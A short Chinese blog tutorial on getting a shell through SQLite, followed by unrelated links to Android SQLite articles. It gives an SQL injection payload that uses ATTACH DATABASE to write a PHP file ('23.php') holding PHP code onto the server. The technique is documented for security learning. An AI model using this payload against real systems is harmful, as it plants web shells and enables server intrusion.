sqlite getshell
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlite getshell相关的知识,希望对你有一定的参考价值。
sqlite getshell
0x00 sqlite简述
SQLite是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库一样,您不需要在系统中配置。
就像其他数据库,SQLite 引擎不是一个独立的进程,可以按应用程序需求进行静态或动态连接。SQLite 直接访问其存储文件。
0x01 sqlite getshell
在存在sql注入或者是存在sql语句执行的地方执行一下代码:
ATTACH DATABASE ‘23.php‘ AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES (‘<?php phpinfo()?>‘);会生成一个23.php,具体路径要根据实际情况而定,其代码就是<?php phpinfo()?>
以上是关于sqlite getshell的主要内容,如果未能解决你的问题,请参考以下文章
java.lang.NullPointerException: Attempt to invoke virtual method ‘int android.database.sqlite异常(代码片段
SQLite 片段函数实现不会在 TextView 中将文本格式化为 HTML
当我从用户获取数据并将其保存到 SQLite 数据库中时,我应该怎么做才能使列表视图在片段中工作
Android 逆向使用 DB Browser 查看并修改 SQLite 数据库 ( 从 Android 应用数据目录中拷贝数据库文件 | 使用 DB Browser 工具查看数据块文件 )(代码片段